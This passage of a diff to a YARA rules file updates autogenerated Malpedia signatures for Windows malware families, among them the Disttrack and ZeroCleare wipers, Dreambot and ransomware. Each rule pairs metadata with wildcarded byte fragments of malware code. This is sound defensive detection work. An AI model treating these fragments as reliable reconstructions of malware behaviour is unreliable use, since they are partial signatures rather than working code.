-		$sequence_5 = { 33c0 0fa4d006 d7 aa c1c206 e2f3 4e }
-		$sequence_6 = { 6aff ff75cc 6a00 6a03 e8???????? c605????????2e 8b7ddc }
-		$sequence_7 = { 6830750000 e8???????? 833d????????00 0f8582000000 6888130000 }
-		$sequence_8 = { 8bec 81c4e4feffff 60 8b4508 8bc8 0520800000 }
-		$sequence_9 = { 6a00 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 }
+		$sequence_0 = { ebbb 0fb68d85fdffff 83f901 7552 c78504edffff00000000 eb0f 8b9504edffff }
+		$sequence_1 = { 8b9514f8ffff 0fbe02 85c0 7502 eb02 ebba 0fb68d9efdffff }
+		$sequence_2 = { eb0f 8b8d08a7ffff 83c101 898d08a7ffff 8b95c8b5ffff 52 e8???????? }
+		$sequence_3 = { eb02 ebba 0fb69568fdffff 83fa01 7553 0f57c0 660f1385347affff }
+		$sequence_4 = { 8b951c7cffff 83c201 8b85207cffff 83d000 89951c7cffff 8985207cffff 83bd207cffffff }
+		$sequence_5 = { 8b953cfaffff 52 e8???????? 83c404 3985b8e7ffff 7d20 8b853cfaffff }
+		$sequence_6 = { c785d8aeffff00000000 eb0f 8b85d8aeffff 83c001 8985d8aeffff 8b8db0bcffff 51 }
+		$sequence_7 = { 8b850899ffff 83d000 89950499ffff 89850899ffff 83bd0899ffff00 7722 720c }
+		$sequence_8 = { eb0f 8b950cb8ffff 83c201 89950cb8ffff 8b85c4daffff 50 e8???????? }
+		$sequence_9 = { ebbb 0fb68d73fdffff 83f901 7552 c785cce7ffff00000000 eb0f 8b95cce7ffff }
 
 	condition:
-		7 of them and filesize < 44864
+		7 of them and filesize < 2322432
 }
-rule MALPEDIA_Win_Disttrack_Auto : FILE
+rule MALPEDIA_Win_Lookback_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e31a7534-93aa-5c3a-8d1c-4db6a4e10208"
+		id = "7580e9e2-80f6-511a-b25c-1dcedd746da6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.disttrack_auto.yar#L1-L275"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lookback_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f3a6eab6984225695ff1eabbd0fc23dd3ab520ffce08e75f88d4a97c81e66461"
+		logic_hash = "23f3d5d64aa0691d5c11d11eeaa6c946ceb564753a29d81b27fd2ba0df02b692"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132940,49 +133520,32 @@ rule MALPEDIA_Win_Disttrack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? }
-		$sequence_1 = { 53 ff15???????? 5d 5b 8bc7 5f 5e }
-		$sequence_2 = { ff15???????? 8d45dc 50 ff15???????? 8b4ddc }
-		$sequence_3 = { 57 e8???????? 6a07 e8???????? 59 c3 6a10 }
-		$sequence_4 = { 52 6a00 6a00 6848000700 }
-		$sequence_5 = { 83c420 53 6800010000 53 53 56 }
-		$sequence_6 = { 89410c 854110 740d 53 }
-		$sequence_7 = { 83c701 83d300 85f6 758c 8b45e0 8b55e4 83c0ff }
-		$sequence_8 = { e8???????? 488d1dae690100 488bcb e8???????? 488bcf 448bc0 4503c0 }
-		$sequence_9 = { 488bd3 33c9 e8???????? 488bd8 488d0584210100 }
-		$sequence_10 = { 498bcd e8???????? 4a8d4c5d80 498bd5 448d0400 e8???????? }
-		$sequence_11 = { 32db ff15???????? c78520ffffff202b4200 c78530ffffff702a4200 c74590cc294200 }
-		$sequence_12 = { 4c2bc6 33d2 8bc3 ffc3 f7b42498000000 428a042a 413201 }
-		$sequence_13 = { 75fc 8b0d???????? 51 e8???????? 83c404 833d????????00 }
-		$sequence_14 = { ff15???????? 32c0 488b8d70030000 4833cc e8???????? 4c8d9c2480040000 }
-		$sequence_15 = { 02c0 02d0 8a45fa 88550c 8ad0 c0ea02 }
-		$sequence_16 = { 8b75f8 2bc1 03c2 c1fb05 83e61f 8d1c9d40174200 }
-		$sequence_17 = { 8975e4 33c0 39b8d0f84100 0f8491000000 ff45e4 83c030 }
-		$sequence_18 = { c7440ae8b4c24100 8b41f8 8b5004 c7440af8???????? 8b41e8 8b5004 }
-		$sequence_19 = { 0fb755d4 0fb745e4 3bd0 750c 0fb74dd6 0fb755e6 }
-		$sequence_20 = { 64a300000000 8965e8 837d0800 741f 837d1c00 7419 }
-		$sequence_21 = { c744243400c34100 c744244408c34100 899c24a0030000 834c242c01 6a04 }
-		$sequence_22 = { 4883ec28 ff15???????? 8b15???????? 448bd8 8bc8 8bc2 412bc3 }
-		$sequence_23 = { 486bd258 490314c8 488d0d1f9b0100 eb11 488d0d169b0100 488bd1 }
-		$sequence_24 = { b856555555 f7e9 53 8bc2 56 c1e81f 8d540204 }
-		$sequence_25 = { c6400d10 488b45b0 83600800 488b45b0 }
-		$sequence_26 = { c744243c702a4200 c784249c0000007c2a4200 8d542444 52 8d442430 89bc245c060000 }
+		$sequence_0 = { 32d9 881c38 40 fec2 }
+		$sequence_1 = { 50 55 896b04 e8???????? 8b4c242c 8b542430 }
+		$sequence_2 = { ffd3 393d???????? 75af eb24 8b0d???????? 51 eb0f }
+		$sequence_3 = { 81fe00300000 7512 8b31 25ff0f0000 03c6 8bf7 }
+		$sequence_4 = { c644240800 88442415 e8???????? 8d4c240c 89442408 51 }
+		$sequence_5 = { 56 ff15???????? 817c240c1c010000 7515 8bbc2438020000 }
+		$sequence_6 = { 0f8407020000 8b35???????? 57 57 57 57 ffd6 }
+		$sequence_7 = { 52 8d442418 57 50 68???????? 57 57 }
+		$sequence_8 = { 55 8bec 51 53 c745fc00000000 b801000000 0fa2 }
+		$sequence_9 = { 56 57 6880020000 8901 c744241480020000 66894104 e8???????? }
 
 	condition:
-		7 of them and filesize < 1112064
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Nightsky_Auto : FILE
+rule MALPEDIA_Win_Splitloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a533df6-d2c4-5b9b-962a-f564ffc19b28"
+		id = "134d8226-eb7c-5031-8a1c-a24d18923a11"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightsky_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splitloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.splitloader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "8ca19ad5375675bc771b33a25611cc75796ee0768ba76a94df6cf267eb73de25"
+		logic_hash = "61ea1a460bed6edfbafde374a204cb805d347ddcc6924015d5eb07560b9fca84"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132996,32 +133559,32 @@ rule MALPEDIA_Win_Nightsky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66d3db 310c24 5b f5 4863c9 }
-		$sequence_1 = { ba08000000 ff15???????? 4c8bf0 4885c0 74e2 488b542460 488bc8 }
-		$sequence_2 = { 8bcf 48f7d0 b8f4400625 f8 d3c0 4002c7 32042a }
-		$sequence_3 = { 41c743e001020304 488d4c2430 41c743e401020304 e8???????? 41b880000000 488d4c2430 488bd7 }
-		$sequence_4 = { 4889442440 4c8d0543150500 488d85b0230000 4889442438 488d15f01e0000 48c744243010000000 e8???????? }
-		$sequence_5 = { 4983f940 72eb e9???????? 488d059e1f0000 48b90000000000000080 488987c8000000 488d0576900200 }
-		$sequence_6 = { b9ffffffff 33ff 4981fffc34d65d 49f7c41926f25d 44894c2420 }
-		$sequence_7 = { 4c8d1d5f570100 4803ed 41ba04000000 4d8d44ed10 498bc8 413818 7431 }
-		$sequence_8 = { 7505 488be9 eb03 4803ed b808000000 48f7e5 490f40c0 }
-		$sequence_9 = { 418bca 48c1e910 83e13f 4533848ea0700400 418bca 48c1e908 4183e23f }
+		$sequence_0 = { 488bc8 ff15???????? 4c8bd8 488905???????? 4885c0 7422 488d151d420000 }
+		$sequence_1 = { 48014d00 418b4c241c 418984240cab0000 418b8424f82a0000 894d4c 488b8c2488000000 3bce }
+		$sequence_2 = { 4c8d5801 4889442448 4c85d8 0f85ff150000 }
+		$sequence_3 = { 488bc8 458d4104 4889742420 ff15???????? 4533c9 }
+		$sequence_4 = { e9???????? 8a03 488d1535c30000 ffc7 4a8b0ce2 4188440f4c 4a8b04e2 }
+		$sequence_5 = { 895dac 895dbc 895df0 4c894dd0 }
+		$sequence_6 = { 0f8c92000000 41838c24042b000001 85c0 0f84ad000000 8b4118 4c8b4910 488b11 }
+		$sequence_7 = { 782e 3b0d???????? 7326 4863c9 488d150c930000 488bc1 }
+		$sequence_8 = { eb77 4c89ac2400080000 4c8b6808 488b00 39b08c000000 744a 8b9888000000 }
+		$sequence_9 = { 4c8d0513700000 41b903000000 488d4c45bc 488bc1 492bc5 48d1f8 }
 
 	condition:
-		7 of them and filesize < 19536896
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Xfsadm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e2459c49-87ff-58be-b5d8-513cfe01796f"
+		id = "6cee945a-b699-5b54-a37c-80744e975247"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bid_ransomware_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xfsadm_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "932fef61c31980fb36a4d7c0896110af89987a449be43ee55891fe684dd7e3ac"
+		logic_hash = "f4eb82f59dbe07c8f1ee2d03c53cd893a45918aeff41d261754b918f12bf1430"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133035,32 +133598,32 @@ rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6a00 6a00 68???????? ff75a8 }
-		$sequence_1 = { 83e03f 8a80f6434000 aa 4e }
-		$sequence_2 = { c20400 55 8bec 83c4fc e8???????? b919000000 bb01000000 }
-		$sequence_3 = { eb15 ff75f4 e8???????? ff75fc e8???????? }
-		$sequence_4 = { 8bc2 c1e80e 83e03f 8a80f6434000 aa 49 7418 }
-		$sequence_5 = { 8a80f6434000 aa 8bc2 c1e814 83e03f }
-		$sequence_6 = { ff75a8 e8???????? c7458405000000 c705????????00000000 }
-		$sequence_7 = { 6a00 e8???????? 55 8bec 8b450c }
-		$sequence_8 = { 8d85d8fdffff 50 68???????? e8???????? 85c0 0f84e2010000 }
-		$sequence_9 = { bb01000000 d3e3 23d8 7421 50 51 }
+		$sequence_0 = { 50 ffd6 68???????? 6a00 ffd7 85c0 740c }
+		$sequence_1 = { e8???????? 83c404 8b7508 c7430c00000000 c7431000000000 c7431400000000 8d4e01 }
+		$sequence_2 = { be01000000 eb02 33f6 8b4508 83c9ff 83c0f0 }
+		$sequence_3 = { ffb6ec000000 8bd8 ffb6d0000000 53 e8???????? 8b86d0000000 8d8ed4000000 }
+		$sequence_4 = { 5f 5e 5d c20400 8d4e0c e8???????? 50 }
+		$sequence_5 = { 75d9 ff06 ebd5 8a1f 80fb22 7405 80fb27 }
+		$sequence_6 = { 85ff 0f857f010000 53 68d80f0000 e8???????? 68d80f0000 }
+		$sequence_7 = { c702???????? e9???????? 8b86fc000000 81c6fc000000 }
+		$sequence_8 = { 33cc e8???????? 8be5 5d c21000 c605????????01 33c0 }
+		$sequence_9 = { b904000000 6a08 6a00 68e8030000 c7400201000000 a1???????? 6a00 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 566272
 }
-rule MALPEDIA_Win_Flowershop_Auto : FILE
+rule MALPEDIA_Win_Rtpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c1734b8-36d9-5030-b687-4c9005cd52ad"
+		id = "959dc55e-8b27-5e8d-9c83-fdb4eeace02c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flowershop_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rtpos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "fe80fc55a0148eaee88f1cb7adb18edcd9b995b61e3ef0f900df914eb5adb176"
+		logic_hash = "e4e59ac435d46c5a64df569379669b4dd97e2cfaff34fac6f768e0380b69204e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133074,34 +133637,34 @@ rule MALPEDIA_Win_Flowershop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 85c0 59 0f8694000000 8d4604 50 }
-		$sequence_1 = { ff15???????? 8bf8 3bfb 7472 0fb705???????? 03c5 56 }
-		$sequence_2 = { 85ff 7419 57 6a00 ff15???????? 50 ff15???????? }
-		$sequence_3 = { 3bde 7479 57 8b3d???????? 56 56 56 }
-		$sequence_4 = { eb3d 8b4604 50 6a00 8b4804 894e04 ffd5 }
-		$sequence_5 = { 6a01 8906 8b4508 8930 58 5f 5e }
-		$sequence_6 = { 57 e8???????? 59 85c0 59 746f 57 }
-		$sequence_7 = { 8bf0 59 85f6 59 7455 80650b00 }
-		$sequence_8 = { 817dfc03010000 7507 6a04 e9???????? a1???????? 85c0 7536 }
-		$sequence_9 = { 75ea ff749e04 43 ff7510 ff550c 59 85c0 }
+		$sequence_0 = { e8???????? 83c408 c745fcffffffff 8d4dc0 e8???????? }
+		$sequence_1 = { 50 8d8df4fdffff 51 8b95f0fdffff 8b421c 50 e8???????? }
+		$sequence_2 = { 6a01 6a00 6a01 6a04 8d8de8fdffff }
+		$sequence_3 = { 894dbc 8b55bc 0fb602 50 }
+		$sequence_4 = { 8b4508 56 be???????? c745ecfcad4200 }
+		$sequence_5 = { 8bec 83ec44 894dfc c745d800000000 682c020000 6a00 }
+		$sequence_6 = { 6bf830 894df8 6a0a 8b048db86a4300 5b 8b543818 8955ec }
+		$sequence_7 = { 8985ecfdffff 6808020000 6a00 8d85f4fdffff 50 e8???????? 83c40c }
+		$sequence_8 = { 8bec 51 894dfc 0fbe4508 83f830 7c12 0fbe4d08 }
+		$sequence_9 = { c745a000000000 e9???????? 8b4508 83c001 894508 8b4d0c }
 
 	condition:
-		7 of them and filesize < 829440
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Anchor_Auto : FILE
+rule MALPEDIA_Win_Zerocleare_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3aabb030-7441-5b84-a113-08295754555e"
+		id = "433422a9-8155-5253-967a-d468274de85b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anchor_auto.yar#L1-L208"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zerocleare_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "3a0df58657b834f57e58b8e626451593809f6f92127cc7c303935ce966927900"
+		logic_hash = "27ba0960de329e73790bd0fb19cb3129bd1f124ee5eb512b9aca888dc53e16b5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133113,194 +133676,73 @@ rule MALPEDIA_Win_Anchor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740c 66c740016578 c6400365 eb0a 66c74001646c c640036c }
-		$sequence_1 = { 6aff 6a00 8d45bc c645fc03 }
-		$sequence_2 = { b101 e8???????? e8???????? 84c0 }
-		$sequence_3 = { 8d45f4 50 e8???????? cc ff25???????? 6a08 68???????? }
-		$sequence_4 = { 8d8dbcfeffff e8???????? 68???????? 8d8dbcfeffff e8???????? 56 8d8dbcfeffff }
-		$sequence_5 = { 2bc2 3bca 7701 48 }
-		$sequence_6 = { ff15???????? 8b15???????? 8bc8 2bc2 }
-		$sequence_7 = { e8???????? 8b0d???????? c1e102 51 }
-		$sequence_8 = { 8b4638 66897810 8b4638 5f 66894812 33c9 }
-		$sequence_9 = { 7509 33d2 33c9 e8???????? }
-		$sequence_10 = { 488d0d5e160400 e8???????? 488b8d80010000 e8???????? }
-		$sequence_11 = { 448865b7 4c8bc0 4c2bc3 488bd3 488d4db7 e8???????? 488d55b7 }
-		$sequence_12 = { 488d0d5c510200 e8???????? 488d8558010000 48894528 }
-		$sequence_13 = { 488d0d5d2c0300 e8???????? 488b8d08010000 e8???????? }
-		$sequence_14 = { 488d0d5c490300 e8???????? 488d0d28490300 e8???????? }
-		$sequence_15 = { 488d0d5a920200 e8???????? 488b8de0000000 e8???????? }
-		$sequence_16 = { 4903c7 c64405b032 4903c7 c64405b02e }
-		$sequence_17 = { 448d4f01 418bd1 448d5772 668908 8d4f75 488b4310 66894802 }
-		$sequence_18 = { 75ae 8bc7 483d00040000 0f83c8010000 44888c05c0050000 }
-		$sequence_19 = { 488d0d5da00100 e8???????? 90 488d0d48d10200 }
-		$sequence_20 = { 488b4338 66894804 8d4f77 488b4338 66894806 8d4f6f 488b4338 }
-		$sequence_21 = { 488d0d5a870200 e8???????? 90 488b8500010000 }
+		$sequence_0 = { 8b8518f8ffff 8bbd14f8ffff 2bc7 c1f803 3bf0 7c83 }
+		$sequence_1 = { 8b3d???????? 8d85c0f7ffff 0f438dd8f7ffff 83bdd4f7ffff08 }
+		$sequence_2 = { 85c0 751f ff15???????? 50 8d4c2404 e8???????? 68???????? }
+		$sequence_3 = { 8945f4 56 8b7508 57 8b13 }
+		$sequence_4 = { 660fd685e8f7ffff c7401000000000 c7401407000000 668908 c645fc04 8b9530f7ffff 83fa08 }
+		$sequence_5 = { ffb5f4f7ffff ffb5f0f7ffff e8???????? 83c408 85c0 7409 }
+		$sequence_6 = { c745cc00000000 8b4104 8b7c1824 8b741820 85ff 7c19 }
+		$sequence_7 = { 6b45e430 8945e0 8d80f0d64400 8945e4 803800 8bc8 7435 }
+		$sequence_8 = { 0f85d2520000 c3 55 8bec a1???????? 334508 5d }
+		$sequence_9 = { e8???????? 83c40c 85c0 744a 6a00 }
 
 	condition:
-		7 of them and filesize < 778240
+		7 of them and filesize < 42670080
 }
-rule MALPEDIA_Win_Dreambot_Auto : FILE
+rule MALPEDIA_Win_Darkcloud_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca125658-e0a0-53ce-a980-872204f0b2dd"
+		id = "e059e862-be86-52e7-8da9-3408fec87995"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dreambot_auto.yar#L1-L1010"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkcloud_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "376288f0c1af3049ba5a8f21b0bc3eb4e04085f83d0b86e461c7b5d308181cec"
+		logic_hash = "dc797d71bdd72f9d3e0bc969cd3f0b1296fdab9f38aa0a923dd640404b9f8c9b"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { ff35???????? ffd6 897b20 6a00 }
-		$sequence_1 = { ffd6 8b44240c 894320 68???????? ff7320 }
-		$sequence_2 = { 50 ff7320 56 ff5710 8b16 }
-		$sequence_3 = { e8???????? 8b7d0c eb02 33c0 8b4f30 83e140 0b4b18 }
-		$sequence_4 = { c7473000000000 e9???????? 834f3001 8b4720 }
-		$sequence_5 = { 8b471c 8b08 81f948545450 740c 81f9504f5354 }
-		$sequence_6 = { 8b4734 e8???????? 85c0 751a }
-		$sequence_7 = { 7475 8b4618 e8???????? 8bf8 85ff 7547 }
-		$sequence_8 = { 3bf3 7474 395d0c 746f }
-		$sequence_9 = { 53 68???????? eb54 3bf3 745c }
-		$sequence_10 = { 0f84b7000000 395d0c 0f84ae000000 6a01 ff750c 56 }
-		$sequence_11 = { 3bf3 0f8481000000 395d0c 747c 6a03 }
-		$sequence_12 = { 68???????? e8???????? 894508 8b7d08 eb24 }
-		$sequence_13 = { 85c0 7520 3bf3 741c }
-		$sequence_14 = { 837d0c04 7516 ff7510 ff36 68???????? }
-		$sequence_15 = { 0f8496000000 395d0c 0f848d000000 6a07 ebdd 3bf3 }
-		$sequence_16 = { 4803542460 41ff5220 4c8b442460 e9???????? }
-		$sequence_17 = { 488b9424a8000000 4533c9 4533c0 ff5028 }
-		$sequence_18 = { eb2c 8b05???????? 413bc5 7528 493bfd 7423 41b904000000 }
-		$sequence_19 = { 418d5620 498bcf ff15???????? 4c8bf0 }
-		$sequence_20 = { 4533f6 488b0b 2580000000 418d5620 }
-		$sequence_21 = { 4c8b18 488b542460 4533c9 488bc8 }
-		$sequence_22 = { bb57000000 e8???????? 413bc5 7446 }
-		$sequence_23 = { 498bcb 492bd0 4803542460 41ff5220 }
-		$sequence_24 = { 0f84ac000000 41b807000000 ebd7 493bfd 0f849b000000 }
-		$sequence_25 = { ebbd 493bfd 0f8481000000 413bf5 747c }
-		$sequence_26 = { 493bfd 0f84d9000000 413bf5 0f84d0000000 }
-		$sequence_27 = { 493bfd 0f84b5000000 413bf5 0f84ac000000 }
-		$sequence_28 = { e8???????? e9???????? 493bfd 0f84b5000000 }
-		$sequence_29 = { 493bfd 0f849b000000 413bf5 0f8492000000 }
-		$sequence_30 = { 5f c3 4053 4883ec20 4c8b4108 488bd9 }
-		$sequence_31 = { 4c896c2420 e8???????? 4c8b442468 488b0d???????? }
-		$sequence_32 = { e8???????? 4c8b1d???????? ba0d000000 41834b3401 }
-		$sequence_33 = { 33d2 89442448 ff15???????? 33d2 }
-		$sequence_34 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 }
-		$sequence_35 = { 415c 5f c3 bb01000000 e9???????? }
-		$sequence_36 = { ff15???????? 4883f8ff 488bf8 7445 488d842488000000 }
-		$sequence_37 = { 4821742428 4c8d8424c8000000 488d542428 488d4c2450 4533c9 e8???????? }
-		$sequence_38 = { 33d2 ff15???????? 4821742428 4c8d8424c8000000 }
-		$sequence_39 = { 33d2 3bc2 0f85bd000000 33c0 89942498000000 }
-		$sequence_40 = { e8???????? f7d0 eb07 8b8424c8000000 3dcad2b74e }
-		$sequence_41 = { 33f6 46 8945f8 85c0 }
-		$sequence_42 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 }
-		$sequence_43 = { ff15???????? 8945fc 85c0 741a 6804010000 8d4f10 51 }
-		$sequence_44 = { 33c0 89942498000000 899424a8000000 8984249c000000 }
-		$sequence_45 = { ff75f4 81c65ff36e3c 89750c 8d750c e8???????? 8bf0 3bf3 }
-		$sequence_46 = { 0f86af030000 488b4a34 813948545450 740c 8139504f5354 }
-		$sequence_47 = { 895dfc e8???????? 8945f8 33ff }
-		$sequence_48 = { 4d8bc4 33d2 ff15???????? 488bf8 }
-		$sequence_49 = { 4883c104 4883c208 4983e801 75e4 8b442420 83f801 }
-		$sequence_50 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? }
-		$sequence_51 = { ff33 50 6810040000 ff15???????? 8945fc }
-		$sequence_52 = { 8945f8 33ff eb03 8b750c ff75f8 69f60d661900 ff75f4 }
-		$sequence_53 = { 483bc3 488b4550 4c8bc3 410f94c1 33d2 4889442420 }
-		$sequence_54 = { 498be9 e8???????? 4885c0 488bf0 0f84a3000000 }
-		$sequence_55 = { 418b44241c 488d5e10 4533f6 488b0b }
-		$sequence_56 = { 488b572c 4533c9 448bc0 498bcd ff5320 }
-		$sequence_57 = { 8db4083089b9ed 57 8d45f4 50 8b450c }
-		$sequence_58 = { 57 4883ec20 8b05???????? 8364243800 }
-		$sequence_59 = { 8945f8 85c0 7551 ff33 50 }
-		$sequence_60 = { 4c8d8424d0000000 48c7c101000080 ff15???????? 85c0 7568 4c8d8c24d0000000 }
-		$sequence_61 = { e8???????? 85c0 0f84fafcffff 4533c9 }
-		$sequence_62 = { 50 ff7310 ff15???????? 33d2 89b7184a0000 }
-		$sequence_63 = { 8d4508 50 56 e8???????? 59 59 8945f0 }
-		$sequence_64 = { e8???????? 8945ec 3bc3 0f84ad010000 53 8d4de4 51 }
-		$sequence_65 = { ff15???????? eb22 ff7518 ff7514 }
-		$sequence_66 = { 4885c9 7405 e8???????? 4883c428 c3 4053 }
-		$sequence_67 = { 0f86ea000000 8b4508 8d843800ffffff 50 }
-		$sequence_68 = { 493bc5 742f 488d4810 ff15???????? }
-		$sequence_69 = { 4c8bc6 ff15???????? 488bd8 493bc7 }
-		$sequence_70 = { a1???????? 35b1492a9d 50 8bd6 e8???????? eb02 33c0 }
-		$sequence_71 = { 8b45fc 0fb700 8bc8 81e100f00000 }
-		$sequence_72 = { 33c0 e8???????? 33c9 41 85c0 }
-		$sequence_73 = { 8be5 5d c20400 8325????????00 6a00 68???????? }
-		$sequence_74 = { 85c0 7505 6a08 58 eb69 ff15???????? }
-		$sequence_75 = { 740e 44893d???????? 44893d???????? 488d442440 4c8d4c2440 4c8d442440 }
-		$sequence_76 = { 4d3bef 7415 498bd5 4883c9ff ff15???????? 8bc8 }
-		$sequence_77 = { 8945f0 ff15???????? 83c068 50 e8???????? 8bf0 8975f4 }
-		$sequence_78 = { c9 c20800 55 8bec 81ec1c010000 8d4807 83e1f8 }
-		$sequence_79 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 }
-		$sequence_80 = { 488bf0 eb34 488d0595d6ffff 4885c0 }
-		$sequence_81 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? }
-		$sequence_82 = { a1???????? 83c01e 50 ff15???????? a1???????? 33c9 }
-		$sequence_83 = { e8???????? 488b0d???????? 448be0 f0834156ff 85c0 }
-		$sequence_84 = { 3a4704 7206 57 e8???????? a1???????? 83c01e 50 }
-		$sequence_85 = { 7505 8d5857 eb15 488b05???????? 89702a 48897d00 eb17 }
-		$sequence_86 = { 83839c000000ff 397818 0f852ffcffff 33c0 }
-		$sequence_87 = { 488b0d???????? 488bfa 4883c12e ff15???????? eb0b }
-		$sequence_88 = { 83c01e 50 ffd6 a1???????? }
-		$sequence_89 = { 8d4604 66d3e0 66098310170000 8d4103 }
-		$sequence_90 = { 8be5 5d c3 0fb708 6683f902 751c }
-		$sequence_91 = { 83a78c00000000 33c0 c3 51 e8???????? }
-		$sequence_92 = { 8b9314170000 83432801 b910000000 8d42f3 2aca }
-		$sequence_93 = { 83c136 83caff f00fc111 33f6 }
-		$sequence_94 = { e8???????? 488b0d???????? 4883c12e ff15???????? }
-		$sequence_95 = { 4c8b1d???????? 418b4356 85c0 75e6 }
-		$sequence_96 = { a1???????? 8b4c2404 8908 83c01e 50 ff15???????? }
-		$sequence_97 = { 8975f4 ffd7 8b1d???????? 6a3a }
-		$sequence_98 = { 0f8495000000 8b3d???????? 6aff 68806967ff 56 ff35???????? e8???????? }
-		$sequence_99 = { a1???????? 83c036 83c9ff f00fc108 85db 0f8425010000 68???????? }
-		$sequence_100 = { c3 33c0 483bc8 7458 488b5128 483bd0 }
-		$sequence_101 = { e9???????? 83f916 0f8fa7080000 0f8415080000 }
